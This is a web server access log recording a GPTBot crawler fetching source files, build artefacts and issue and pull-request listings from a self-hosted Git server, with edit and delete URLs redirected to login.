git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 21147] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 20648] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11370] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 19946] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:17:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:35:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/main.py" -[17/Feb/2026:17:35:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/main.py" -[17/Feb/2026:17:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 9804] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 861] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11302] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10114] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 11182] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12005] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" -[17/Feb/2026:17:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:17:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" -[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" -[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11369] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:17:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 